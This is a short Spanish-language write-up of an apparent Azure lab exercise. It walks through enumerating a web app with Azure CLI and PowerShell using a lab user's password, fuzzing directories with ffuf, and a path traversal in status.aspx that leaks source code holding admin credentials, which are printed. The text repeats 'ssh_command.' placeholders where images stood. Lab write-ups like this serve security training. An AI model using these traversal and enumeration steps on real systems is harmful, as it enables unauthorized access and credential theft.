Cu3rv0x
Bypass Azure Web App Authentication with Path Traversal

Bypass Azure Web App Authentication with Path Traversal


Azure PwnedLabs

az logout

Disconnect-AzAccount

az login -u annette.palmer@megabigtech.com -p 'Beach9999!

az account show | jq -r "{homeTenantId}"

ssh_command.

Usamos este comando para desplegar una lista de recursos asignados a annette.

az resource list --query "[].{ID:id, Name:name, Type:type, ResourceGroup: resourceGroup, Identity:identity}"

ssh_command.

En el portal se ve mas o menos asi:

ssh_command.

ssh_command.

az webapp show -n megabigtech-dev_group -g megabigtech-dev —query “enabledHostNames” -o table

ssh_command.

Es muy raro que no se pueda ver con este comando entonces vamos a ver a que tenemos acceso.

az role assignment list --asignee "annette.palmer@megabigtech.com" --all --output table

ssh_command.

Me di cuenta que aunque tenga acceso de poder leer esto no esta permitido en az web app show.

Connect-AzAccount -AccountId "annette.palmer@megabigtech.com"

ssh_command.

ssh_command.

ssh_command.

ssh_command.

Get-AzResource

ssh_command.

(Get-AzWebApp -ResourceGroupName "megabigtech-dev_group" -Name "megabigtech-dev").EnabledHostNames

Esto devuelve una aplicación web de Azure llamada «megabigtech-dev» en el grupo de recursos «megabigtech-dev_group». Con este comando conseguimos los host habilitados.

ssh_command.

Get-AzWebApp -Name "megabigtech-dev"

ssh_command.

Vemos que es una servicio administrado.

Vemos lo siguiente:

https://megabigtech-dev.scm.auzrewebsites.net

Pero como no tengo rol de contribuidor no podemos hacer nada con kudu.

ssh_command.

Esto no es el caso con

https://megabigtech-dev.auzrewebsites.net

ssh_command.

https://megabigtech-dev.azurewebsites.net/status.aspx?status=latest

Vemos un tipo de monitoreo para la pagina.

ssh_command.

bc archivo.txt

ssh_command.

ffuf -w Directories_Common.wordlist -request archivo.txt -recursion -recursion-depth 1 -e .aspx

ssh_command.

Como ../admin no tiene nada.

Nos dirigimos a https://megabigtech-dev.azurewebsites.net/status.aspx?status=../admin/login.aspx

ssh_command.

https://megabigtech-dev.azurewebsites.net/status.aspx?status=../admin/login.aspx

Nos genera esto. Si cambiamos el archivo a login.aspx.cs

ssh_command.

Entonces nos dirigimos a

https://megabigtech-dev.azurewebsites.net/status.aspx?status=../admin/login.aspx.cs

ssh_command.

Credenciales= admin@megabigtech.com:m3G4b1GT3cH@DMIN!

https://megabigtech-dev.azurewebsites.net/status.aspx?status=../admin/login.aspx

Iniciamos sesion.

ssh_command.

ssh_command.

© 2025 Cu3rv0x